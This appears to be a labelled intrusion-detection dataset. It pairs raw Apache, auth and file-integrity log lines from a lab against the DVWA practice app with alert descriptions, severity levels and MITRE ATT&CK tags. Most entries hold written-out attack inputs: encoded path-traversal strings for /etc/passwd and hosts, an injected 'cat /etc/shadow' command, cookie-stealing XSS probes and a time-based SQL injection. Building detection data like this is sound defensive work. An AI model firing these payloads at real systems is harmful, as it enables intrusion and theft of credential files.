["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:39 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255cetc%255cpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:56 +0500] "GET /DVWA/login.php?username=../../../../../../../winnt HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:48 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2fvar%2flog%2fapache%2faccess%2elog%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:39 +0500] "GET /read_body.php?mailbox=<script>alert(document.cookie)</script>&passed_id=<script>alert(document.cookie)</script>&startMessage=1&show_more=0 HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:42 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%0a%2fbin%2fcat%20%2fetc%2fshadow&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:14 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%c0%af%2e%2e%01%c0%af%2e%2e%01%c0%afetc%c0%afissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:57 +0500] "GET /cgi-bin/dnewsweb.cgi HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:34 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:33 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%uF025%2e%2e%2e%2e%2f%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:43:59 sohaib-virtual-machine sudo: sohaib : TTY=pts/2 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "0qLHrcrE"; file /snap/core22/864/usr/lib/python3.10/sqlite3; printf "command_done_%s" "SrW35sew"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:39 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255c%2e%2e%2e%2e%2f%255cetc%255cissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:24 +0500] "GET /cgi-bin/2bru3pbu.pl?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple XSS (Cross Site Scripting) attempts from same source ip.
10
["T1059"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:38 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cIMG%20SRC%3d%26%7bjavascript%3aalert(1)%3b%7d%3b%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:44 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:27:44 +0500] "GET /DVWA/login.php?Login=Login&password=.../.../.../.../.../.../.../.../etc/passwd&password=&user_token=8b200124ecd990a2056241cb3415035a&username= HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%c1%af%2e%2e%2e%2e%2f%c1%af%2e%2e%2e%2e%2f%c1%af%2e%2e%2e%2e%2f%c1%af%2e%2e%2e%2e%2f%c1%afetc%c1%afissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2flogs%2ferror%2elog&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/go-build2314020258/b031/importcfg' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%c0%qfetc%c0%qfpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:49:02 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:39 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%252f%2e%2e%2e%2e%2f%252f%2e%2e%2e%2e%2f%252f%2e%2e%2e%2e%2f%252fetc%252fissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:32 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:25 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0%3a0%3a20'%20--&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:39 +0500] "GET /cgi-bin/index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('jaws_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/auth.log
Oct 18 23:51:29 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
syscheck
File '/tmp/go-build2314020258/b062/importcfg' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:36 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3ciframe%20onbeforeload%20iframe%20onbeforeload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20onbeforeload%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:17 +0500] "GET /DVWA/gm.cgi HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:03 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:14 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%uEFC8&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:40:07 sohaib-virtual-machine sudo: sohaib : TTY=pts/3 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "Q4QBErMG"; which which; printf "command_done_%s" "Lu3yDitn"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:26 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%2f%5C%2e%2e%2f%5C%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:36 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:03 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%252f%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:34 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:48:00 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
syscheck
File '/tmp/go-build2314020258/b025/exp_amd64.o' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:42 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:05 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:33 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e0x2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/apt.data.wqj941' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '58863' to '78068' Old md5sum was: 'ac09f9f29fbed875c22f2ec5a591a5fa' New md5sum is : 'e6620ff20d61679e8b2b017228b9afd8' Old sha1sum was: '8becefa94fddf273ec30a0b434685a18fc834b2d' New sha1sum is : 'cc3e953ab46c2895b106f9c717fc13d36cbdd343' Old sha256sum was: '167cfce36fdb9ef1ee6066f79b6fe427526ad922f2f23c978e6053a80f06a9f7' New sha256sum is : '48d9ab3d5768d8218c3472f27c7280dba6370ac2d72c5bd21671bd7b7f656b53'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%c1%pc%2e%2e%2e%2f%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:19:47 +0500] "GET /DVWA/login.php?user_token=%00jdadqq HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:13 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%f0%80%80%af%2e%00%2e%f0%80%80%af%2e%00%2e%f0%80%80%af%2e%00%2e%f0%80%80%af%2e%00%2e%f0%80%80%afetc%f0%80%80%afpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]